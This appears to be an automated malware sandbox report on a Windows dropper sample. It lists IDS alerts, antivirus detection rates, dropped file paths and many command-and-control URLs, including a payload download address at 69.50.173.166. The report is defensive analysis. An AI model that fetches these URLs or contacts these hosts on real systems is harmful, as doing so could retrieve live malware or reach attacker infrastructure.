Source Port:	80
Destination Port:	49760
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497622016803 12/08/22-20:24:10.656758
SID:	2016803
Source Port:	80
Destination Port:	49762
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a .tk domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.861460532012811 12/08/22-20:23:01.398654
SID:	2012811
Source Port:	61460
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497482016803 12/08/22-20:23:41.280184
SID:	2016803
Source Port:	80
Destination Port:	49748
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497292016803 12/08/22-20:23:20.165240
SID:	2016803
Source Port:	80
Destination Port:	49729
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497452016803 12/08/22-20:23:39.766236
SID:	2016803
Source Port:	80
Destination Port:	49745
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a *.pw domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.861579532016778 12/08/22-20:23:38.443764
SID:	2016778
Source Port:	61579
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497422016803 12/08/22-20:23:34.311501
SID:	2016803
Source Port:	80
Destination Port:	49742
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497472016803 12/08/22-20:23:41.215053
SID:	2016803
Source Port:	80
Destination Port:	49747
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497242016803 12/08/22-20:23:12.742181
SID:	2016803
Source Port:	80
Destination Port:	49724
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497082016803 12/08/22-20:23:00.337340
SID:	2016803
Source Port:	80
Destination Port:	49708
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497062016803 12/08/22-20:22:59.657038
SID:	2016803
Source Port:	80
Destination Port:	49706
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497262016803 12/08/22-20:23:16.216936
SID:	2016803
Source Port:	80
Destination Port:	49726
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a .tk domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.863001532012811 12/08/22-20:23:02.044069
SID:	2012811
Source Port:	63001
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497232016803 12/08/22-20:23:12.677852
SID:	2016803
Source Port:	80
Destination Port:	49723
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497272016803 12/08/22-20:23:16.282865
SID:	2016803
Source Port:	80
Destination Port:	49727
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497202016803 12/08/22-20:23:10.238692
SID:	2016803
Source Port:	80
Destination Port:	49720
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497212016803 12/08/22-20:23:10.319155
SID:	2016803
Source Port:	80
Destination Port:	49721
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497022016803 12/08/22-20:22:58.664946
SID:	2016803
Source Port:	80
Destination Port:	49702
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497032016803 12/08/22-20:22:58.726634
SID:	2016803
Source Port:	80
Destination Port:	49703
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497052016803 12/08/22-20:22:59.544698
SID:	2016803
Source Port:	80
Destination Port:	49705
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497092016803 12/08/22-20:23:00.402533
SID:	2016803
Source Port:	80
Destination Port:	49709
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497002016803 12/08/22-20:22:57.985784
SID:	2016803
Source Port:	80
Destination Port:	49700
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a *.pw domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.854652532016778 12/08/22-20:23:50.665042
SID:	2016778
Source Port:	54652
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480496972016803 12/08/22-20:22:40.675539
SID:	2016803
Source Port:	80
Destination Port:	49697
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a .tk domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.860602532012811 12/08/22-20:23:30.604071
SID:	2012811
Source Port:	60602
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query to a .tk domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.860649532012811 12/08/22-20:23:33.187785
SID:	2012811
Source Port:	60649
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query to a .tk domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.858670532012811 12/08/22-20:23:52.939717
SID:	2012811
Source Port:	58670
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497302016803 12/08/22-20:23:20.231725
SID:	2016803
Source Port:	80
Destination Port:	49730
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497412016803 12/08/22-20:23:34.242393
SID:	2016803
Source Port:	80
Destination Port:	49741
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a .tk domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.853828532012811 12/08/22-20:24:08.518284
SID:	2012811
Source Port:	53828
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET DNS Query to a *.pw domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.852733532016778 12/08/22-20:23:35.381544
SID:	2016778
Source Port:	52733
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497502016803 12/08/22-20:23:51.851922
SID:	2016803
Source Port:	80
Destination Port:	49750
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET DNS Query to a *.pw domain - Likely Hostile - Source IP: 192.168.2.4 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.48.8.8.858894532016778 12/08/22-20:24:01.234435
SID:	2016778
Source Port:	58894
Destination Port:	53
Protocol:	UDP
Classtype:	Potentially Bad Traffic

ET TROJAN Known Sinkhole Response Header - Source IP: 167.99.35.88 - Destination IP: 192.168.2.4

Timestamp:	167.99.35.88192.168.2.480497632016803 12/08/22-20:24:10.721330
SID:	2016803
Source Port:	80
Destination Port:	49763
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: KJEfMLiuRS.exe	Virustotal: Detection: 87%			Perma Link
Source: KJEfMLiuRS.exe	ReversingLabs: Detection: 96%

Antivirus / Scanner detection for submitted sample

Source: KJEfMLiuRS.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://utbidet-ugeas.biz/d/N?02AC7D265AAC7D265A9D7D0A5AAC7DBA6225536FC3AD7DE6F2AE7910749E531F689C4D085A	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?0224A77D0D24A77D0D15A7510D24A7E135AD89349425A7BDA526A34B231689443F14975	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?0270CC764670CC764641CC5A4670CCEA7EF9E23FDF71CCB6EE72C8406842E24F7440FC5846	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?022E11CAC92E11CAC91F11E6C92E1156F1A73F83502F110A612C15FCE71C3FF3FB1E21E4C9	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?020CA607B80CA607B83DA62BB80CA69B8085884E210DA6C7100EA231963E883E8A3C9629B8	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/cc	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02B6E63A40B6E63A4087E61640B6E6A6783FC873D9B7E6FAE8B4E20C6E84C8037286D61440	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?020A97C9E70A97C9E73B97E5E70A9755DF83B9807E0B97094F0893FFC938B9F0D53AA7E7E7	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?027A3A75947A3A75944B3A59947A3AE9ACF3143C0D7B3AB53C783E43BA48144CA64A0A5	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02380640623806406209066C623806DC5AB12809FB390680CA3A02764C0A28795008366E62	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02885B61A6885B61A6B95B4DA6885BFD9E0175283F895BA10E8A5F5788BA755894B86B4	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/rpt?http://%s.biz/d/G?http://%s.biz/d/N?ntdbg.exeidbg32.exeahuy.exeaset32	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?0259DEF0B359DEF0B368DEDCB359DE6C8BD0F0B92A58DE301B5BDAC69D6BF0C98169EEDEB3	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?020C1E43550C1E43553D1E6F550C1EDF6D85300ACC0D1E83FD0E1A757B3E307A673C2E6	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02141BBAD9141BBAD9251B96D9141B26E19D35F340151B7A71161F8CF7263583EB242B9	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?020A97C9E70A97C9E73B97E5E70A9755DF83B9807E0B97094F0893FFC938B9F0D53AA7E	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?020CA607B80CA607B83DA62BB80CA69B8085884E210DA6C7100EA231963E883E8A3C962	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02380640623806406209066C623806DC5AB12809FB390680CA3A02764C0A28795008366	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?022502EAE32502EAE31402C6E3250276DBAC2CA37A24022A4B2706DCCD172CD3D11532C	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02DF53E35ADF53E35AEE53CF5ADF537F62567DAAC3DE5323F2DD57D574ED7DDA68EF63C	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02CDBC4B4FCDBC4B4FFCBC674FCDBCD777449202D6CCBC8BE7CFB87D61FF92727DFD8C6	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?0290EC449890EC4498A1EC689890ECD8A019C20D0191EC843092E872B6A2C27DAAA0DC6	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?028E21AF728E21AF72BF2183728E21334A070FE6EB8F216FDA8C25995CBC0F9640BE118	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?020C1E43550C1E43553D1E6F550C1EDF6D85300ACC0D1E83FD0E1A757B3E307A673C2E6D55	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?0290EC449890EC4498A1EC689890ECD8A019C20D0191EC843092E872B6A2C27DAAA0DC6A98	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/rpt?	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02DF53E35ADF53E35AEE53CF5ADF537F62567DAAC3DE5323F2DD57D574ED7DDA68EF63CD5A	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02289E4B28289E4B28199E6728289ED710A1B002B1299E8B802A9A7D061AB0721A18AE6	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?022502EAE32502EAE31402C6E3250276DBAC2CA37A24022A4B2706DCCD172CD3D11532C4E3	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02CDBC4B4FCDBC4B4FFCBC674FCDBCD777449202D6CCBC8BE7CFB87D61FF92727DFD8C654F	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?028E21AF728E21AF72BF2183728E21334A070FE6EB8F216FDA8C25995CBC0F9640BE118172	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?025C9DA2735C9DA2736D9D8E735C9D3E4BD5B3EBEA5D9D62DB5E99945D6EB39B416CAD8	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02CCB3E1F2CCB3E1F2FDB3CDF2CCB37DCA459DA86BCDB3215ACEB7D7DCFE9DD8C0FC83C	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02083A3281083A3281393A1E81083AAEB981147B18093AF2290A3E04AF3A140BB3380A1C81	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?020A8DA1850A8DA1853B8D8D850A8D3DBD83A3E81C0B8D612D088997AB38A398B73ABD8F85	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?022E11CAC92E11CAC91F11E6C92E1156F1A73F83502F110A612C15FCE71C3FF3FB1E21E	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02B6E63A40B6E63A4087E61640B6E6A6783FC873D9B7E6FAE8B4E20C6E84C8037286D61	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?020A8DA1850A8DA1853B8D8D850A8D3DBD83A3E81C0B8D612D088997AB38A398B73ABD8	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?027A3A75947A3A75944B3A59947A3AE9ACF3143C0D7B3AB53C783E43BA48144CA64A0A5B94	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?0259DEF0B359DEF0B368DEDCB359DE6C8BD0F0B92A58DE301B5BDAC69D6BF0C98169EED	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02289E4B28289E4B28199E6728289ED710A1B002B1299E8B802A9A7D061AB0721A18AE6528	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02083A3281083A3281393A1E81083AAEB981147B18093AF2290A3E04AF3A140BB3380A1	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02141BBAD9141BBAD9251B96D9141B26E19D35F340151B7A71161F8CF7263583EB242B94D9	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02885B61A6885B61A6B95B4DA6885BFD9E0175283F895BA10E8A5F5788BA755894B86B4FA6	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?025C9DA2735C9DA2736D9D8E735C9D3E4BD5B3EBEA5D9D62DB5E99945D6EB39B416CAD8C73	Avira URL Cloud: Label: malware
Source: http://69.50.173.166/gdnOT2424.exe	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02CCB3E1F2CCB3E1F2FDB3CDF2CCB37DCA459DA86BCDB3215ACEB7D7DCFE9DD8C0FC83CFF2	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?0270CC764670CC764641CC5A4670CCEA7EF9E23FDF71CCB6EE72C8406842E24F7440FC5	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?0224A77D0D24A77D0D15A7510D24A7E135AD89349425A7BDA526A34B231689443F1497530D	Avira URL Cloud: Label: malware
Source: http://utbidet-ugeas.biz/d/N?02AC7D265AAC7D265A9D7D0A5AAC7DBA6225536FC3AD7DE6F2AE7910749E531F689C4D0	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\ogvubeak-omooc.dll	Avira: detection malicious, Label: TR/Dldr.Agent.apd.18
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Avira: detection malicious, Label: TR/Drop.Age.apd.1.E
Source: C:\Windows\SysWOW64\ubboonook.exe	Avira: detection malicious, Label: TR/Drop.Age.apd.1.E
Source: C:\Windows\SysWOW64\ivtahook-eaceab.dll	Avira: detection malicious, Label: TR/Dldr.Agent.apd.17
Source: C:\Users\user\AppData\Roaming\tmp1D9F.tmp	Avira: detection malicious, Label: TR/Drop.Age.apd.1.E
Source: C:\Windows\SysWOW64\atgusoon-odeas.exe	Avira: detection malicious, Label: TR/Drop.Age.apd.1.E

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\ogvubeak-omooc.dll	ReversingLabs: Detection: 80%
Source: C:\Windows\SysWOW64\ivtahook-eaceab.dll	ReversingLabs: Detection: 80%
Source: C:\Windows\SysWOW64\olfopeh-outix.exe	ReversingLabs: Detection: 96%

Machine Learning detection for sample

Source: KJEfMLiuRS.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Windows\SysWOW64\olfopeh-outix.exe	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\ubboonook.exe	Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\atgusoon-odeas.exe	Joe Sandbox ML: detected

Source: 2.2.olfopeh-outix.exe.400000.0.unpack	Avira: Label: TR/Drop.Age.apd.1.E
Source: 0.0.KJEfMLiuRS.exe.400000.0.unpack	Avira: Label: TR/Drop.Age.apd.1.E
Source: 0.2.KJEfMLiuRS.exe.40e640.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 2.0.olfopeh-outix.exe.400000.0.unpack	Avira: Label: TR/Drop.Age.apd.1.E
Source: 1.0.olfopeh-outix.exe.400000.0.unpack	Avira: Label: TR/Drop.Age.apd.1.E

Source: KJEfMLiuRS.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Networking

Tries to download HTTP data from a sinkholed server

Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:22:40 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:22:40 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:22:57 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:22:57 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:22:58 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:22:58 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:22:59 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:22:59 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:00 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:00 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:00 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:01 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:05 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:06 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:06 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:07 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:10 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:10 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:12 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:12 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:16 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:16 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:20 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:20 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:25 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:25 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:27 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:27 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:31 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:31 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:34 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:34 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:39 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:39 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:41 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:41 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:51 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:51 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:54 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:23:54 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:24:02 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:24:06 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:24:07 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:24:07 GMTConnection: keep-aliveX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:24:10 GMTConnection: closeX-Sinkhole: Malware
Source: global traffic	HTTP traffic detected: HTTP/1.1 204 No ContentServer: nginxDate: Thu, 08 Dec 2022 19:24:10 GMTConnection: keep-aliveX-Sinkhole: Malware

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2016803 ET TROJAN Known Sinkhole Response Header 167.99.35.88:80 -> 192.168.2.4:49696
Source: Traffic	Snort IDS: 2016803 ET TROJAN Known Sinkhole Response Header 167.99.35.88:80 -> 192.168.2.4:49697
Source: Traffic	Snort IDS: 2016803 ET TROJAN Known Sinkhole Response Header 167.99.35.88:80 -> 192.168.2.4:49699
Source: Traffic	Snort IDS: 2016803 ET TROJAN Known Sinkhole Response Header 167.99.35.88:80 -> 192.168.2.4:49700
Source: Traffic	Snort IDS: 2016803 ET TROJAN Known Sinkhole Response Header 167.99.35.88:80 -> 192.168.2.4:49702
Source: Traffic	Snort IDS: 2016803 ET TROJAN Known Sinkhole Response Header 167.99.35.88:80 -> 192.168.2.4:49703
